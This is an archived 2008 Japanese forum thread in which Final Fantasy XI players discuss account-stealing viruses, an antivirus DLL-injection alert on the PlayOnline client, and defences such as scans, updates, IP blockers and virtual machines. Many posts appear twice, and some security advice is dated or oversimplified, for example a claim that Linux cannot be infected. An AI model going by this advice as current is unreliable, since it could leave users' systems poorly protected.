ファイル名:C:\Program Files\PlayOnline\squareEnix\PlayOnlineViewer\pol.exe
該当ポリシー:DLL(プログラムライブラリ)インジェクション
実行した処理:拒否
上記です。
「拒否してるんだから大丈夫じゃないの」と言ったんですが、聞け聞けうるさいので教えてあげてもらえないでしょうか。
ここで回答が得られない限り安心できないようです(笑
>>102-103さん、ご回答ありがとうございました。
書き込んだ本人は張ってくださったリンク先をみたりもしたようですが、「テンプレ」がなにかわからなかったらしく私が呼ばれました(笑
さて、テンプレ内容ですが正直いって私にも少々内容が難しいので勉強しつつ、主人が戻りましたらこちらを見せてPCのチェック等をして対策したいと思います。
皆様、ご親切にご指導いただき本当にありがとうございました。
なお、最後になりますが娘がウィルスだといってメモったものがあるので、内容を書き込ませてください。
8/4 15:40 拒否 C:\Program Files\PlayOnline\squareEnix\PlayOnlineViewer\pol.exe
15:40 確認 C:\Program Files\PlayOnline\squareEnix\PlayOnlineViewer\pol.exe
種類:API Event
検出ソース/プロセスID:NtUserSetWindowsHookEx
ファイル名:C:\Program Files\PlayOnline\squareEnix\PlayOnlineViewer\pol.exe
該当ポリシー:DLL(プログラムライブラリ)インジェクション
実行した処理:拒否
上記です。
「拒否してるんだから大丈夫じゃないの」と言ったんですが、聞け聞けうるさいので教えてあげてもらえないでしょうか。
ここで回答が得られない限り安心できないようです(笑
109 :既にその名前は使われています:2008/08/05(火) 11:53:09 ID:ZGJBobt7
家族で2chフイタwwwwwwwwwwww
110 :既にその名前は使われています:2008/08/05(火) 11:58:34 ID:/uJ74QKU
>>108
バスター使ってないからアレだけど、DLLインジェクションってヤバくね?w
今、話題のウィルスはウィルス定義が最新ならバスターで検出できたはずなんだけど・・・
定義が最新じゃなかったら感染してるかもなw
バスター使ってないからアレだけど、DLLインジェクションってヤバくね?w
今、話題のウィルスはウィルス定義が最新ならバスターで検出できたはずなんだけど・・・
定義が最新じゃなかったら感染してるかもなw
111 :既にその名前は使われています:2008/08/05(火) 11:58:35 ID:nMCNF7hE
前スレで頻繁に出てきてた誤検出のやつ?かな
112 :既にその名前は使われています:2008/08/05(火) 12:06:27 ID:dKrAcyfJ
>>108
とりあえず自分はウィルスバスターを使用してないないので詳しくは判らないですが
過去のスレッドでは誤認ではないかとの事でした。
しかしウィルスの可能性もあるのでスキャンをしてみるのが良いかと思います。
後、ウィンドーズのアップデート、各プログラムのアップデートもお忘れなく。
とりあえず自分はウィルスバスターを使用してないないので詳しくは判らないですが
過去のスレッドでは誤認ではないかとの事でした。
しかしウィルスの可能性もあるのでスキャンをしてみるのが良いかと思います。
後、ウィンドーズのアップデート、各プログラムのアップデートもお忘れなく。
113 :既にその名前は使われています:2008/08/05(火) 12:20:14 ID:lc9NOKVQ
分からないことがあるのに分からないままにしておくよりは、親御さんに聞いてでも
しっかり対策したほうが偉いね。これから親子でセキュリティ頑張ってくれ。
ただしこのスレで何でも聞けばいいってもんではないからある程度は自分で調べてね
しっかり対策したほうが偉いね。これから親子でセキュリティ頑張ってくれ。
ただしこのスレで何でも聞けばいいってもんではないからある程度は自分で調べてね
114 :既にその名前は使われています:2008/08/05(火) 12:22:03 ID:krsYnpHJ
>>108 カーサンに免じてスレ違いに答えるw
バージョンが2008 ウィンドウスアップデートや そのほかのアプリケーションのアップデートはきちんとされていると仮定します。違う場合はスルーしてください。
ウィルスバスターのメイン画面を起動して
ウィルススパイウェア対策の 不正監視の変更の DLLインジェクションが「常に拒否」になってたりはしませんか?
もしそうなら 処理を確認するにしてみてください。
この確認には パスワードが必要かも知れません。
もしパスワードが設定されているなら 設定をカスタマイズしているということなので設定したご本人(101さんのお父様でしょうか?)に確認するのが一番早いです。
誤検出に関しては パッチ済みだったと記憶しております。
NtUserSetWindowsHookExでグーグル検索すると
この例が結構ヒットしますので確認の上アップデートと検索をしてください。
ご家族のうち お父様だけがPCの管理をしていらっしゃるようですが
ご家族でお使いのご様子、 お嬢様 奥様ともにインターネットの最低限の知識を身につけてご利用になることをお勧めいたします。
バージョンが2008 ウィンドウスアップデートや そのほかのアプリケーションのアップデートはきちんとされていると仮定します。違う場合はスルーしてください。
ウィルスバスターのメイン画面を起動して
ウィルススパイウェア対策の 不正監視の変更の DLLインジェクションが「常に拒否」になってたりはしませんか?
もしそうなら 処理を確認するにしてみてください。
この確認には パスワードが必要かも知れません。
もしパスワードが設定されているなら 設定をカスタマイズしているということなので設定したご本人(101さんのお父様でしょうか?)に確認するのが一番早いです。
誤検出に関しては パッチ済みだったと記憶しております。
NtUserSetWindowsHookExでグーグル検索すると
この例が結構ヒットしますので確認の上アップデートと検索をしてください。
ご家族のうち お父様だけがPCの管理をしていらっしゃるようですが
ご家族でお使いのご様子、 お嬢様 奥様ともにインターネットの最低限の知識を身につけてご利用になることをお勧めいたします。
115 :既にその名前は使われています:2008/08/05(火) 12:23:19 ID:08LEbksP
カスペルスキーオンラインスキャン汁↓
ttp://www.just-kaspersky.jp/products/try/onlscan.html
FlashplayerのVer 9.0.124.0 これ以外のVerならやられますよ
Realplayerの有無 入ってるとやられる可能性高いですよ
WindowsUpdateの有無 常に最新にしておかないとやられちゃいますよ
ttp://www.just-kaspersky.jp/products/try/onlscan.html
FlashplayerのVer 9.0.124.0 これ以外のVerならやられますよ
Realplayerの有無 入ってるとやられる可能性高いですよ
WindowsUpdateの有無 常に最新にしておかないとやられちゃいますよ
116 :既にその名前は使われています:2008/08/05(火) 12:25:54 ID:/zQeZCdt
J( 'ー`)しカーチャン
117 :既にその名前は使われています:2008/08/05(火) 12:30:53 ID:GviG4IPN
101の彼氏です,
状況を詳しくお願いしたい。
昼飯をご馳走になったが少々塩が強すぎかと思われます。
状況を詳しくお願いしたい。
昼飯をご馳走になったが少々塩が強すぎかと思われます。
118 :既にその名前は使われています:2008/08/05(火) 12:35:32 ID:R2+TH1q0
だめだこの家族
119 :既にその名前は使われています:2008/08/05(火) 12:36:43 ID:/zQeZCdt
吉野屋のコピペ想い出した。
120 :既にその名前は使われています:2008/08/05(火) 12:38:34 ID:l3p2CsZi
カーちゃんは30代だな
121 :既にその名前は使われています:2008/08/05(火) 12:40:42 ID:lc9NOKVQ
お前ら人妻と知った途端に手の平を返すんじゃないw
122 :既にその名前は使われています:2008/08/05(火) 12:42:10 ID:/uJ74QKU
いやいや、そこはネタだろwww
123 :既にその名前は使われています:2008/08/05(火) 12:43:06 ID:STrIPs3s
カスペルスキー導入後、「worm Helkern IP(中国系)からの攻撃をブロックしました」って頻繁に出るのですが、これは何ですか?気持ち悪いです><
124 :既にその名前は使われています:2008/08/05(火) 12:45:06 ID:QuBsXG8N
今さらだがPeerGuardian2導入しようと思ったらリンク切れててできなかった件
125 :既にその名前は使われています:2008/08/05(火) 12:56:43 ID:f3W24S+v
日本語版がダメなら英語版を入れるんだ
126 :既にその名前は使われています:2008/08/05(火) 12:58:42 ID:dJg7/res
>>101に釣られすぎw
127 :既にその名前は使われています:2008/08/05(火) 13:03:37 ID:pDZDqfkj
101と108同じIDやんかwww
128 :既にその名前は使われています:2008/08/05(火) 13:04:02 ID:/uJ74QKU
>>123
ルーター買えw
ルーター買えw
129 :既にその名前は使われています:2008/08/05(火) 13:05:51 ID:whbK6lKQ
>127
家族なんだから当たり前だろう!
家族なんだから当たり前だろう!
130 :既にその名前は使われています:2008/08/05(火) 13:06:06 ID:ZGJBobt7
>>127
そりゃ、家族で同じPC使ってるなら同じIDだろwwwwwwwwwwwwww
そりゃ、家族で同じPC使ってるなら同じIDだろwwwwwwwwwwwwww
131 :既にその名前は使われています:2008/08/05(火) 13:06:08 ID:neNlBUKx
132 :既にその名前は使われています:2008/08/05(火) 13:07:33 ID:/zQeZCdt
>>127
の人気にshit
の人気にshit
133 :既にその名前は使われています:2008/08/05(火) 13:12:05 ID:GcdLckwL
ps3最高 大画面で寝転んでネットもできるし 起動も超速い macとかps3とか少数派はウイルスかかににくい
134 :既にその名前は使われています:2008/08/05(火) 13:12:33 ID:yL8bj8sr
135 :既にその名前は使われています:2008/08/05(火) 13:12:39 ID:dJg7/res
136 :既にその名前は使われています:2008/08/05(火) 13:12:43 ID:R2+TH1q0
>>123
放置。
放置。
137 :既にその名前は使われています:2008/08/05(火) 13:15:38 ID:mSCO7I3W
101母です、ご飯食べてました。
>>112さん、ありがとうございます。私も前スレ見てみますね。
>>114さん、途中までやってみましたがやはりパスワード要求されましたので、
主人が戻りましたらここを見せてもう一回やってみます。
>>115さん、カペルスキーのオンラインスキャンですか。
これくらいなら私にもできそうなので早速やってみます。
ウィンドウズアップデートは今やってみたらwindowsXP ServicePack3がまだ入っていないようです、
入れたほうがいいですよね?
どうもスレ違いになってきているようですし、いろいろと方向は指し示していただけたので、これを機会に少し勉強しようと思います。
娘には可哀想ですが、安全が分からないので今日のFFはあきらめるよう言いました。
不安がりようが見ていて可哀想なので、早く安全を確認してあげたいです。
それでは消えます。お世話になりました。
>>112さん、ありがとうございます。私も前スレ見てみますね。
>>114さん、途中までやってみましたがやはりパスワード要求されましたので、
主人が戻りましたらここを見せてもう一回やってみます。
>>115さん、カペルスキーのオンラインスキャンですか。
これくらいなら私にもできそうなので早速やってみます。
ウィンドウズアップデートは今やってみたらwindowsXP ServicePack3がまだ入っていないようです、
入れたほうがいいですよね?
どうもスレ違いになってきているようですし、いろいろと方向は指し示していただけたので、これを機会に少し勉強しようと思います。
娘には可哀想ですが、安全が分からないので今日のFFはあきらめるよう言いました。
不安がりようが見ていて可哀想なので、早く安全を確認してあげたいです。
それでは消えます。お世話になりました。
138 :既にその名前は使われています:2008/08/05(火) 13:22:53 ID:vpeqSQLo
始めてきたっぽい母が「スレ違い」なんて言うかよw
全ての語尾に「。」があるから同一人物だし
全ての語尾に「。」があるから同一人物だし
139 :既にその名前は使われています:2008/08/05(火) 13:24:32 ID:Hm3tz/m8
>>134の記事見てきた、英文でわからなかった。
最初の一文だけで判断するとウィルスが仕込まれているらしいけど、
どの過程かわからないから英語版落としてきたけど、ちょっとためらうな。
誰か英語わかる人翻訳お願いしますだ。
最初の一文だけで判断するとウィルスが仕込まれているらしいけど、
どの過程かわからないから英語版落としてきたけど、ちょっとためらうな。
誰か英語わかる人翻訳お願いしますだ。
140 :既にその名前は使われています:2008/08/05(火) 13:26:02 ID:Z24ThRzv
あれじゃね鬼女板の住人なんじゃね?w
141 :既にその名前は使われています:2008/08/05(火) 13:29:18 ID:dJg7/res
>>135で煽ったら>>137が即釣れたwお母様タイピング早すぎw
>101母です、ご飯食べてました。
>114さん、途中までやってみましたがやはりパスワード要求されましたので、
飯食ってたのか確認作業してたのかどっちですか?w
まぁ煽りはここら辺までにしておいて、実際スパイウェア仕込済ならFFログイン控えても何の解決にはなりませんよと。
逆に不正ログインの可能性あって現状判断できる知識がないなら、ログインして不正アクセスを即目視できるように
パパスが帰ってくるまで画面張り付いてたほうがいいw
>101母です、ご飯食べてました。
>114さん、途中までやってみましたがやはりパスワード要求されましたので、
飯食ってたのか確認作業してたのかどっちですか?w
まぁ煽りはここら辺までにしておいて、実際スパイウェア仕込済ならFFログイン控えても何の解決にはなりませんよと。
逆に不正ログインの可能性あって現状判断できる知識がないなら、ログインして不正アクセスを即目視できるように
パパスが帰ってくるまで画面張り付いてたほうがいいw
142 :既にその名前は使われています:2008/08/05(火) 13:32:13 ID:3DBogvt1
編: ええ、ですから、オンラインゲームにおける保険業というのが、現実味を帯びてきたというか、すでにニーズがあると思うんですよね。
田中氏: ウチも保険屋さんをそろそろ……。
Sundi氏: じゃあ子会社作りますか!
田中氏: サンディ・インシュアランス?(笑)。
(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)
田中氏: ウチも保険屋さんをそろそろ……。
Sundi氏: じゃあ子会社作りますか!
田中氏: サンディ・インシュアランス?(笑)。
(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)(笑)
143 :既にその名前は使われています:2008/08/05(火) 13:41:33 ID:JpM0FCGI
おまいら母に噛みつきすぎwww
てか135は母みてないんでね?
見てたとしても華麗にスルーしてるあたり熟練ねらーだと思うが。
ここにきたのは初めてかもだが、みたかぎり母は初めてとは書いてないね。
娘はそれっぽいが。
てか135は母みてないんでね?
見てたとしても華麗にスルーしてるあたり熟練ねらーだと思うが。
ここにきたのは初めてかもだが、みたかぎり母は初めてとは書いてないね。
娘はそれっぽいが。
144 :既にその名前は使われています:2008/08/05(火) 13:45:10 ID:HbaiKcB9
>>106、>>107
レスサンクス
まずBの方にある更新してないソフト探して最新の物にするように言っておきます
AをFF専用にPCに、というのが一番簡単で安全な方法なのかもしれないけど…
Aが俺のFF兼私事PC、Bが兄の私事PC、なのでそれは厳しいのだ俺の財布的に考えて
しばらくは兄の質問に俺が答えるって形で納得して貰います
レスサンクス
まずBの方にある更新してないソフト探して最新の物にするように言っておきます
AをFF専用にPCに、というのが一番簡単で安全な方法なのかもしれないけど…
Aが俺のFF兼私事PC、Bが兄の私事PC、なのでそれは厳しいのだ俺の財布的に考えて
しばらくは兄の質問に俺が答えるって形で納得して貰います
145 :既にその名前は使われています:2008/08/05(火) 13:58:26 ID:dJg7/res
>>144
あくまで>106の言うとおり現状としては。って部分をしっかり認識しとこうな。
6月中旬〜下旬にかけて猛威振るってるタイプに関して言えばFlash最新+パス保存はしない
これだけやっておけば、抜かれることはまずないと思う
ただし今後と言う意味でなら色んな感染の可能性もあるわけだ。被害広がって初めて傾向と対策が作り上げられてる現状だからね
一番有効なのは>93の例じゃないかな
あくまで>106の言うとおり現状としては。って部分をしっかり認識しとこうな。
6月中旬〜下旬にかけて猛威振るってるタイプに関して言えばFlash最新+パス保存はしない
これだけやっておけば、抜かれることはまずないと思う
ただし今後と言う意味でなら色んな感染の可能性もあるわけだ。被害広がって初めて傾向と対策が作り上げられてる現状だからね
一番有効なのは>93の例じゃないかな
146 :既にその名前は使われています:2008/08/05(火) 13:59:41 ID:tmyHudgZ
前スレで出てきてたウィルスだけど、大体各社検出できるようになったみたい。
ttp://www.virustotal.com/analisis/d17fd341f1142e39b00db34e6f68432a
有名どころはほぼ対応完了かな。
検体送った方お疲れ様でした。
NODが×になってるがEset Smart Securityの方では検出できることを確認。
ttp://www.virustotal.com/analisis/d17fd341f1142e39b00db34e6f68432a
有名どころはほぼ対応完了かな。
検体送った方お疲れ様でした。
NODが×になってるがEset Smart Securityの方では検出できることを確認。
147 :既にその名前は使われています:2008/08/05(火) 14:01:18 ID:krsYnpHJ
>>139
>>134の記事は PG2のリスト Bluetack’s level 1 blocklist が NOD32を拒否ってたから
ウィルス認定されちったよーんw ってこと
日本語化が落とせないのは おいてるサーバ flnet.orgが7月からリニューアルしてて
Dukedogさんが 対応してないとかじゃないかと思う
>>134の記事は PG2のリスト Bluetack’s level 1 blocklist が NOD32を拒否ってたから
ウィルス認定されちったよーんw ってこと
日本語化が落とせないのは おいてるサーバ flnet.orgが7月からリニューアルしてて
Dukedogさんが 対応してないとかじゃないかと思う
148 :既にその名前は使われています:2008/08/05(火) 14:02:35 ID:tmyHudgZ
ってsymantecが検出できてないじゃないか…
149 :既にその名前は使われています:2008/08/05(火) 14:03:24 ID:dJg7/res
150 :既にその名前は使われています:2008/08/05(火) 14:10:08 ID:HbaiKcB9
>>145
普段からこのスレ見てるのでその辺は大丈夫だと思う、一応最低でも自分のPCは対策してあるので
兄弟とはいえいちいち人のPC見るのもどうかと思ってたから、Bの方でちゃんと対策してあるかわからないんだよね
あと>93見ると、そのPC設定をしたPCはFF専用PCになってしまうみたいだからやりたくないのだ
>ただし今後と言う意味でなら色んな感染の可能性もあるわけだ。
ここが一番気になる所、最新でも抜かれたらどうしようもないよねって感じで>105の質問したのね
俺だけならネット見ないとかで防げるだろうけど、どうしても不安になる
最近2ch専用ブラウザのJane導入してほぼネット見ないような状態だし
普段からこのスレ見てるのでその辺は大丈夫だと思う、一応最低でも自分のPCは対策してあるので
兄弟とはいえいちいち人のPC見るのもどうかと思ってたから、Bの方でちゃんと対策してあるかわからないんだよね
あと>93見ると、そのPC設定をしたPCはFF専用PCになってしまうみたいだからやりたくないのだ
>ただし今後と言う意味でなら色んな感染の可能性もあるわけだ。
ここが一番気になる所、最新でも抜かれたらどうしようもないよねって感じで>105の質問したのね
俺だけならネット見ないとかで防げるだろうけど、どうしても不安になる
最近2ch専用ブラウザのJane導入してほぼネット見ないような状態だし
151 :既にその名前は使われています:2008/08/05(火) 14:16:24 ID:dKrAcyfJ
>>144
PG2はタスクアイコンからオンオフできるので、FFやってる最中に情報調べないなら
PG2の>>93全IPリスト有効、終わったら全IPリスト解除してリネージュ資料室のリスト
等をオンにできたりする。まあ、どっちにしろ必ずしも安全ではないし不便だが
最新のウィルスにはある程度有効だと思う。
ネット専用PCに手が出なくても今持ってるPCの性能が良い場合は頑張って
勉強してVMwareとLinuxの導入を検討してみるのが一番いいと思う。
PG2はタスクアイコンからオンオフできるので、FFやってる最中に情報調べないなら
PG2の>>93全IPリスト有効、終わったら全IPリスト解除してリネージュ資料室のリスト
等をオンにできたりする。まあ、どっちにしろ必ずしも安全ではないし不便だが
最新のウィルスにはある程度有効だと思う。
ネット専用PCに手が出なくても今持ってるPCの性能が良い場合は頑張って
勉強してVMwareとLinuxの導入を検討してみるのが一番いいと思う。
152 :既にその名前は使われています:2008/08/05(火) 14:17:58 ID:krsYnpHJ
>>150 だったら バーチャルPCとかブラウザの仮想化はどう?
virtualboxで古いOSだけどvinelinuxなら導入が簡単でPENIIのノートくらいには使えるし
環境設定済みのvirtualbox用ubuntsなんてのもある。こっちだと7zが必要かも。
前スレの梅にでてた safespaceっていうので ブラウザの仮想化すれば
仮想化した状態ではお気に入りの追加やダウンロードはできないけど 本体に影響はないしキーロガーにも対応してたと思う。
赤枠でるから 見た目はイヤンだけどなw
virtualboxで古いOSだけどvinelinuxなら導入が簡単でPENIIのノートくらいには使えるし
環境設定済みのvirtualbox用ubuntsなんてのもある。こっちだと7zが必要かも。
前スレの梅にでてた safespaceっていうので ブラウザの仮想化すれば
仮想化した状態ではお気に入りの追加やダウンロードはできないけど 本体に影響はないしキーロガーにも対応してたと思う。
赤枠でるから 見た目はイヤンだけどなw
153 :既にその名前は使われています:2008/08/05(火) 14:22:34 ID:Hm3tz/m8
154 :既にその名前は使われています:2008/08/05(火) 14:28:47 ID:HbaiKcB9
155 :既にその名前は使われています:2008/08/05(火) 14:32:06 ID:tmyHudgZ
仮想化(ブラウザ)はまだ発展途上。
本格的にはもう少し先になるかもな。
仮想PCなら充分実用範囲だが。
本格的にはもう少し先になるかもな。
仮想PCなら充分実用範囲だが。
156 :既にその名前は使われています:2008/08/05(火) 14:39:05 ID:A4FFR7Gl
エロイ人教えて
今週の週刊アスキーに「USBメモリーにUbuntu!」っていう記事があるんだけど、それでWeb閲覧環境を作ったとして
それでそっちでこの一連のウィルスのに感染したとしたら本体のWindows環境にも感染する?
今週の週刊アスキーに「USBメモリーにUbuntu!」っていう記事があるんだけど、それでWeb閲覧環境を作ったとして
それでそっちでこの一連のウィルスのに感染したとしたら本体のWindows環境にも感染する?
157 :既にその名前は使われています:2008/08/05(火) 14:53:43 ID:f3W24S+v
Linuxが感染する訳無いだろう・・・
158 :既にその名前は使われています:2008/08/05(火) 15:01:51 ID:dKrAcyfJ
ウィルスの大半はウィンドーズ用に作成されたものが多いのでLinuxが感染する確立は非常に低い。
まったく無いとは言えないが、許可なしに知らないプログラムを勝手にインストールさせないLinuxは
Windowsよりかなり安全と言える。
記事読んでないので詳しくは判らないが、仮想環境を作ってUSBに導入した場合は
たとえLinuxが感染したとしてもメインのOS(Windows)とゲストOS(Linux)同士で
ファイルの共有の設定をしてない場合はファイルが隔離されているので
二つのPCを使っているような感じで、ゲストOSが感染しても大事なファイルを
ゲストOSに導入していなければほぼ安全。
USBからデュアルブートしてる場合は
1台のPCとしてファイルを共有しちゃうので、安全性が少し落ちる。
しかもLinuxかWindowsどちらかを立ち上げるには再起動が必要になりめんどくさくなる。
まったく無いとは言えないが、許可なしに知らないプログラムを勝手にインストールさせないLinuxは
Windowsよりかなり安全と言える。
記事読んでないので詳しくは判らないが、仮想環境を作ってUSBに導入した場合は
たとえLinuxが感染したとしてもメインのOS(Windows)とゲストOS(Linux)同士で
ファイルの共有の設定をしてない場合はファイルが隔離されているので
二つのPCを使っているような感じで、ゲストOSが感染しても大事なファイルを
ゲストOSに導入していなければほぼ安全。
USBからデュアルブートしてる場合は
1台のPCとしてファイルを共有しちゃうので、安全性が少し落ちる。
しかもLinuxかWindowsどちらかを立ち上げるには再起動が必要になりめんどくさくなる。
159 :95:2008/08/05(火) 15:16:10 ID:LttZ30io
すまね;動転して張っちまった
ヴァナモン厨呼ばわりは心外だ。
Wikiの中尉アサルトでケルベロスのWS一覧のとこに貼ってあったんだよ
で、踏んだ後で「しまった!これヤベーとこじゃ?」と思って諸兄に聞いたほうが
早いと思って尋ねたんだ。
PG2、ノートン入れてあるパソコンで、IFRAME、Javaは全部切ってる。
アーガスはブラックじゃないと出たが・・・心配でね;
(テンプレのチェックはしてWin32ファイルも確かめたんだが・・・)
ヴァナモン厨呼ばわりは心外だ。
Wikiの中尉アサルトでケルベロスのWS一覧のとこに貼ってあったんだよ
で、踏んだ後で「しまった!これヤベーとこじゃ?」と思って諸兄に聞いたほうが
早いと思って尋ねたんだ。
PG2、ノートン入れてあるパソコンで、IFRAME、Javaは全部切ってる。
アーガスはブラックじゃないと出たが・・・心配でね;
(テンプレのチェックはしてWin32ファイルも確かめたんだが・・・)
160 :既にその名前は使われています:2008/08/05(火) 16:15:05 ID:dJg7/res
>>159
テンプレの確認法とってなお不安抱えるならクリーンインストールしかないよ
よく質問で「大丈夫だとは思うけど、やっぱり心配で」って言う人多いけどさ
逆に聞くと感染してるかもって認識もったPCを放置してて平気なのか?
テンプレの確認法とってなお不安抱えるならクリーンインストールしかないよ
よく質問で「大丈夫だとは思うけど、やっぱり心配で」って言う人多いけどさ
逆に聞くと感染してるかもって認識もったPCを放置してて平気なのか?
161 :既にその名前は使われています:2008/08/05(火) 17:29:00 ID:FDL7oTjX
「仮想環境」で、ちょっと思ったんだが、
WindowsOSを「非」管理者権限で使うのって、どう?(あいまいだけど。)
みんな、管理できるかどうか関係無く、管理者権限付きで使ってるよね?
UNIX系OSの運用でよくやる、普段は一般ユーザー、必要なときだけrootになるっていうのを
Windowsでやった場合、どのくらい効果あって、どんだけ不便になるのかな?
WindowsOSを「非」管理者権限で使うのって、どう?(あいまいだけど。)
みんな、管理できるかどうか関係無く、管理者権限付きで使ってるよね?
UNIX系OSの運用でよくやる、普段は一般ユーザー、必要なときだけrootになるっていうのを
Windowsでやった場合、どのくらい効果あって、どんだけ不便になるのかな?
162 :既にその名前は使われています:2008/08/05(火) 17:30:07 ID:FDL7oTjX
ああ、ウィルス対策として不完全なのはわかるけど、どの「程度」なのかとねw
ぜひ、そうしたいとかじゃなくて、ちょっと思っただけw
ぜひ、そうしたいとかじゃなくて、ちょっと思っただけw
163 :既にその名前は使われています:2008/08/05(火) 17:49:06 ID:R2+TH1q0
UsersとかPower Usersとかいろいろあるんだけど
Win9xあたりから開発してる人は気にしないからか
無駄に管理者権限を要求するインストーラやアプリが多い。
で、ユーザも管理者権限常用するようになる
(それでVistaのUACができた)。
Administratorsに属する"foo"さんではだめで
"Administrator"さんじゃなきゃだめという
すごいアプリも見たことがある。
Win9xあたりから開発してる人は気にしないからか
無駄に管理者権限を要求するインストーラやアプリが多い。
で、ユーザも管理者権限常用するようになる
(それでVistaのUACができた)。
Administratorsに属する"foo"さんではだめで
"Administrator"さんじゃなきゃだめという
すごいアプリも見たことがある。
164 :既にその名前は使われています:2008/08/05(火) 18:04:22 ID:gQ07+cxs
suにあたるコマンドが無いからなぁ
Win2kだと、ショートカット作らないと別ユーザーで実行することすら
ままならんのだが、その辺どうなったのかね
Win2kだと、ショートカット作らないと別ユーザーで実行することすら
ままならんのだが、その辺どうなったのかね
165 :既にその名前は使われています:2008/08/05(火) 18:21:15 ID:FDL7oTjX
インストーラなら、想定内かなぁ。無駄はともかく。
suして、make installみたいな感じだよね。
で、そのsuが無いのは、GUIゆえの不便さみたいなトコなんで大目に見るのかな。
FFXIとブラウザがあればイイです、みたいなヒトなら不便はないのかね。
suして、make installみたいな感じだよね。
で、そのsuが無いのは、GUIゆえの不便さみたいなトコなんで大目に見るのかな。
FFXIとブラウザがあればイイです、みたいなヒトなら不便はないのかね。
166 :既にその名前は使われています:2008/08/05(火) 19:49:02 ID:R2+TH1q0
WinNTで別ユーザで実行というのはrunasがあるけど
GUIに慣れてると使いづらいのよね。
GUIに慣れてると使いづらいのよね。
167 :既にその名前は使われています:2008/08/05(火) 20:45:18 ID:CJFmfe+7
下がっているのでageときますね
168 :既にその名前は使われています:2008/08/05(火) 20:56:56 ID:zQJ9cncL
最盛期に抜かれて久しぶりに見に来たんだが、前に比べると被害は減っているのかしらね
169 :既にその名前は使われています:2008/08/05(火) 21:11:00 ID:Sim0EzZs
親父はまだかーーーーーーーーーーーーーー!!!!!!!!
170 :既にその名前は使われています:2008/08/05(火) 21:41:41 ID:mcfTLm7+
>>168
地域フィルタ設けたし、ちょっと減ったかな
最大原因のユーザーのセキュリティ意識がいまだ低いままだから
新種現れたらまた増加するだろうけど
ゲストログインを自分でon/off設定ぐらいできるようにはならないのかね
地域フィルタ設けたし、ちょっと減ったかな
最大原因のユーザーのセキュリティ意識がいまだ低いままだから
新種現れたらまた増加するだろうけど
ゲストログインを自分でon/off設定ぐらいできるようにはならないのかね
171 :既にその名前は使われています:2008/08/05(火) 21:47:51 ID:87AhO3NS
そのうちPOLメールに添付ファイルついてきて・・・とか妄想した
172 :既にその名前は使われています:2008/08/05(火) 21:52:54 ID:zQJ9cncL
>>170
7/10に復旧依頼だしてまだメール来てないんだが、復旧してももーちょっと落ち着くまでは様子見にしておくかねぇ
7/10に復旧依頼だしてまだメール来てないんだが、復旧してももーちょっと落ち着くまでは様子見にしておくかねぇ
173 :既にその名前は使われています:2008/08/05(火) 22:02:48 ID:lc9NOKVQ
174 :既にその名前は使われています:2008/08/05(火) 22:04:41 ID:mcfTLm7+
>>171
POLにきたメールでもウィルス感染すんのかな
>>172
今すぐやりてぇ!ってわけじゃないなら、そのほうがいいかもね
次はどんな手でくるかわからんし、ちょっと様子見したほうがいいかもしれない
POLにきたメールでもウィルス感染すんのかな
>>172
今すぐやりてぇ!ってわけじゃないなら、そのほうがいいかもね
次はどんな手でくるかわからんし、ちょっと様子見したほうがいいかもしれない
175 :既にその名前は使われています:2008/08/05(火) 22:17:40 ID:zQJ9cncL
□eも次世代MMOの開発してんなら、11の時点で対応策を試してみてノウハウを蓄積させておくべきだろーに
壮大な実験()笑 で犯した失敗をそのまま持ち越したら、それこそ愚の骨頂だと思うんだがな
壮大な実験()笑 で犯した失敗をそのまま持ち越したら、それこそ愚の骨頂だと思うんだがな
176 :既にその名前は使われています:2008/08/05(火) 22:50:18 ID:qUo1mgjU
avasutoきったら軽いぜ・・・
177 :既にその名前は使われています:2008/08/05(火) 22:53:53 ID:PKvYIuQp
178 :既にその名前は使われています:2008/08/05(火) 23:33:22 ID:9XUmHMGq
対応の人件費は膨大だと思うが。
数千万くらい無駄になってないか。
数千万くらい無駄になってないか。
179 :既にその名前は使われています:2008/08/05(火) 23:40:21 ID:1m6R0ULS
180 :既にその名前は使われています:2008/08/05(火) 23:43:47 ID:LeVb83eu
>>178
人件費?復旧のための社員が増員されてたり、給料がふえるとでも思ってるの?
このご時勢、増員なしで残業させてるんでしょうに。サービス残業でね
会社への直接的な被害はそれほどないんじゃないかな〜
人件費?復旧のための社員が増員されてたり、給料がふえるとでも思ってるの?
このご時勢、増員なしで残業させてるんでしょうに。サービス残業でね
会社への直接的な被害はそれほどないんじゃないかな〜
181 :既にその名前は使われています:2008/08/05(火) 23:52:15 ID:OoiGIFLB
>>177
チャットでアカウントハックの件で、今後何かするのか質問したら
一応、かなり重く受け止めていて、何らかの対応策をとる予定と回答来た
んだけどね・・・まぁ定形の返答文書なのか、本気か嘘か判らないけどさ。
チャットでアカウントハックの件で、今後何かするのか質問したら
一応、かなり重く受け止めていて、何らかの対応策をとる予定と回答来た
んだけどね・・・まぁ定形の返答文書なのか、本気か嘘か判らないけどさ。
182 :既にその名前は使われています:2008/08/05(火) 23:54:25 ID:zQJ9cncL
>>181
っ対応マニュアル
っ対応マニュアル
183 :既にその名前は使われています:2008/08/06(水) 00:18:28 ID:6/0krTMQ
184 :既にその名前は使われています:2008/08/06(水) 00:20:44 ID:wuxKve7S
ああ、あったねー
多分あれは @pol.com 宛のランダムでの配信だったんだろうけど
PS2からだと文字化けして読めなかったのあったな
多分あれは @pol.com 宛のランダムでの配信だったんだろうけど
PS2からだと文字化けして読めなかったのあったな
185 :既にその名前は使われています:2008/08/06(水) 06:30:24 ID:2RrgA8Nd
なんかネット開くとこの証明は〜〜だけに有効です。ってエラーがでるようになったんだが・・・
ウィルスっぽいの感染しちゃったかな・・・
でも仕事だから家でなくちゃいけないOrz
ウィルスっぽいの感染しちゃったかな・・・
でも仕事だから家でなくちゃいけないOrz
186 :既にその名前は使われています:2008/08/06(水) 06:44:57 ID:tFPmVnTs
187 :既にその名前は使われています:2008/08/06(水) 08:20:09 ID:NKORBWTj
今カスペでオンラインスキャンできないんだけど俺だけ?
188 :既にその名前は使われています:2008/08/06(水) 09:05:07 ID:Xs/gP1az
俺も404出るな
189 :既にその名前は使われています:2008/08/06(水) 09:33:00 ID:qbmYVvAc
カスペのオンラインスキャンが使えなきゃ@niftyウイルスチェックサービスを使えばいいじゃない
190 :既にその名前は使われています:2008/08/06(水) 10:35:06 ID:hejMR+aD
クズエニ死ね
